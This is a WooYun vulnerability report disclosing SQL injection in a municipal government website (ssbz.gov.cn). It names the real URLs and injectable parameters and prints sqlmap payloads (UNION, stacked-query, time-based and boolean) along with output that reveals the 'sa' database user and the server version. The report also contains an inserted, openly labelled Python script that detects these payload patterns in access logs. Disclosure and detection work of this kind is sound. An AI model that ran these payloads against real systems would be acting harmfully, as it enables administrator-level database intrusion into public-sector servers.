
Vulnerability summary

Defect ID: wooyun-2014-077529

Title: SQL injection in a municipal administrative service center website (sa privileges)

Related vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2014-09-28 13:50

Fixed: 2014-11-12 13:52

Published: 2014-11-12 13:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-09-28: Details sent to the vendor, awaiting vendor handling
2014-09-29: Vendor confirmed; details visible to the vendor only
2014-10-09: Details disclosed to core white hats and relevant domain experts
2014-10-19: Details disclosed to regular white hats
2014-10-29: Details disclosed to intern white hats
2014-11-12: Details disclosed to the public

Brief description:

Multiple parameters are injectable.

Detailed description:

How it started:

http://wooyun.org/bugs/wooyun-2014-070878


After seeing that report I tested a bit, then moved on to the other parameters, and found quite a few problems.
Test URL 1:

http://www.ssbz.gov.cn/web/web_info_list.jsp?type=13&catalog=2


Both the type and catalog parameters here are injectable.

---
Place: GET
Parameter: type
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: type=-6262' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(114)+CHAR(122)+CHAR(113)+CHAR(90)+CHAR(122)+CHAR(85)+CHAR(114)+CHAR(106)+CHAR(109)+CHAR(77)+CHAR(86)+CHAR(90)+CHAR(105)+CHAR(113)+CHAR(101)+CHAR(111)+CHAR(121)+CHAR(113),NULL,NULL-- &catalog=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=13'; WAITFOR DELAY '0:0:5'--&catalog=2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: type=13' WAITFOR DELAY '0:0:5'--&catalog=2
---
[14:02:16] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
[14:02:16] [INFO] fetching current user
[14:02:16] [WARNING] reflective value(s) found and filtering out
current user: 'sa'
[14:02:16] [INFO] fetching current database
current database: 'appo_ss'
---
Place: GET
Parameter: catalog
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=13&catalog=2' AND 5341=5341 AND 'WDMH'='WDMH
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: type=13&catalog=2' UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(114)+CHAR(122)+CHAR(113)+CHAR(67)+CHAR(121)+CHAR(97)+CHAR(85)+CHAR(103)+CHAR(88)+CHAR(109)+CHAR(100)+CHAR(117)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(111)+CHAR(121)+CHAR(113),NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=13&catalog=2'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: type=13&catalog=2' WAITFOR DELAY '0:0:5'--
---


Test URL 2:

http://www.ssbz.gov.cn/web/web_info.jsp?id=484


GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=484' AND 3470=3470 AND 'vzOi'='vzOi
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=484'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=484' WAITFOR DELAY '0:0:5'--
---


Test URL 3:

http://www.ssbz.gov.cn/web/about_us.jsp?type=16


GET parameter 'type' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=16' AND 8161=8161 AND 'ztMN'='ztMN
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: type=16' UNION ALL SELECT NULL,CHAR(113)+CHAR(108)+CHAR(102)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(101)+CHAR(90)+CHAR(119)+CHAR(113)+CHAR(111)+CHAR(65)+CHAR(108)+CHAR(75)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(114)+CHAR(113),NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=16'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: type=16' WAITFOR DELAY '0:0:5'--
---
[14:23:42] [INFO] testing Microsoft SQL Server
[14:23:42] [INFO] confirming Microsoft SQL Server
[14:23:44] [INFO] the back-end DBMS is Microsoft SQL Server
[14:23:44] [INFO] fetching banner
web application technology: JSP
back-end DBMS operating system: Windows 2003 Service Pack 2
back-end DBMS: Microsoft SQL Server 2000
banner:
---
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
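The sqlmap output above shows three payload families against the type, catalog and id parameters: WAITFOR DELAY time delays (also as stacked queries), AND n=n tautologies, and UNION ALL SELECT with CHAR()-assembled strings. As an added example that is not part of the original report, the following Python scans constructed access-log lines (assumed combined log format; client IPs, timestamps and sizes are invented) for those shapes, so a defender can find the same probing in their own web-server logs:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the report); they mirror
# the payload shapes sqlmap reported against the type=, catalog= and id= parameters.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2014:14:02:16 +0800] "GET /web/web_info_list.jsp?type=13&catalog=2 HTTP/1.1" 200 5120
10.0.0.7 - - [28/Sep/2014:14:02:17 +0800] "GET /web/web_info_list.jsp?type=13%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--&catalog=2 HTTP/1.1" 200 5120
10.0.0.7 - - [28/Sep/2014:14:02:18 +0800] "GET /web/web_info.jsp?id=484%27%20AND%203470%3D3470%20AND%20%27vzOi%27%3D%27vzOi HTTP/1.1" 200 4410
10.0.0.7 - - [28/Sep/2014:14:02:19 +0800] "GET /web/about_us.jsp?type=16%27%20UNION%20ALL%20SELECT%20NULL%2CCHAR(113)%2BCHAR(108)%2BCHAR(102)%2CNULL%2CNULL-- HTTP/1.1" 500 312
"""

# Request line of a combined-format access log: method, path(+query), protocol.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')

# One signature per injection technique sqlmap listed in the report.
SIGNATURES = [
    ("time-based blind", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),   # AND 3470=3470
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("CHAR() string assembly", re.compile(r"(?:CHAR\(\d+\)\s*\+\s*){2,}CHAR\(\d+\)", re.I)),
    ("stacked query", re.compile(r"'\s*;\s*[A-Za-z]")),                     # 13'; WAITFOR ...
]

def decode_query(path: str) -> str:
    """Return the percent-decoded query string of a request path ('' if none)."""
    _, _, query = path.partition("?")
    return unquote_plus(query)

def classify(decoded_query: str) -> list[str]:
    """Names of every signature that matches the decoded query string."""
    return [name for name, rx in SIGNATURES if rx.search(decoded_query)]

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """(client ip, script path, matched techniques) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        techniques = classify(decode_query(m.group(1)))
        if techniques:
            hits.append((line.split()[0], m.group(1).partition("?")[0], techniques))
    return hits

if __name__ == "__main__":
    for ip, script, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip} {script}: {', '.join(techniques)}")
```

Decoding the query string before matching matters, since sqlmap percent-encodes quotes, semicolons and the `+` between CHAR() calls; keyword matching like this is a triage signal for existing logs and does not replace fixing the queries themselves.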


Proof of vulnerability:

[Screenshot attached in the original report: FR@EWC{N(ANQQW6$}K5DAVF.jpg]

Fix recommendation:

Filter every parameter across the whole site :)

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-09-29 16:37

Vendor reply:

Latest status:

None yet